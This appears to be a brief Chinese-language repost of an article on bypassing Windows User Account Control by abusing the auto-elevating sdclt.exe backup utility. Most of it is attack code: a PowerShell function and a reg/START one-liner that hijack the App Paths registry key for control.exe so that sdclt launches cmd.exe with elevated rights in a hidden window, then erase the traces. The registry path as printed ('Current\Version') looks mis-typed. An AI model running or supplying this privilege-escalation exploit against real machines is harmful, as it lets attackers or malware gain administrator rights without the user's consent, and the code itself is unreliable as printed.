本文讲的是
绕过UAC系列之 SDCLT的利用,
SDCLT是Windows系统(Windows 7及更高版本)中使用的Microsoft二进制文件,允许用户执行备份和恢复操作。 但是它只是 Windows 将autoElevate设置为“true”的所有Microsoft二进制文件中的一个。 这一点可以通过使用sysinternals中的
Sigcheck
工具并浏览其清单文件进行验证:
HKCU\Software\Microsoft\Windows\Current\Version\App Paths\control.exe
HKCU\Software\Classes\exefile\shell\runas\command\IsolatedCommand
function SdcltUACBypass(){ Param ( [String]$program = "C:\Windows\System32\cmd.exe" #default ) #Create Registry Structure New-Item "HKCU:Software\Microsoft\Windows\Current\Version\App Paths\control.exe" -Force Set-ItemProperty -Path "HKCU:Software\Microsoft\Windows\Current\Version\App Paths\control.exe" -Name "(default)" -Value $program -Force #Start sdclt.exe Start-Process "C:\Windows\System32\sdclt.exe" -WindowStyle Hidden #Cleanup Start-Sleep 3 Remove-Item "HKCU:Software\Microsoft\Windows\Current\Version\App Paths\control.exe" -Recurse -Force }
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Version\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Version\App Paths\control.exe" /f
原文发布时间为:2017年9月13日
本文作者:丝绸之路
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。